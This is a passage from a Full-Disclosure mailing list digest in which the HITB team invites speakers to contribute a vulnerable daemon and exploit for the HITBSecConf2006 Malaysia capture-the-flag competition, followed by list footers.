of our continued efforts to improve on the game and raise the bar each
year, we are inviting speakers to contribute a daemon and exploit for
this years CTF competition. For further details on the submission
process, kindly e-mail dinesh -at- hackinthebox.org or ctfinfo -at-
hackinthebox.org.

On behalf of The HITB Team, we thank you and look forward to receiving
your submissions! See you guys in September!

HITBSecConf2006 - Malaysia: Deep-Knowledge Network Security 
http://conference.hackinthebox.org/hitbsecconf2006kl/ 
http://conference.hitb.org/hitbsecconf2006kl/ 



------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

End of Full-Disclosure Digest, Vol 13, Issue 8
**********************************************

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Re: Full-Disclosure Digest, Vol 13, Issue 8 DONNY MCCOY (Mar 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault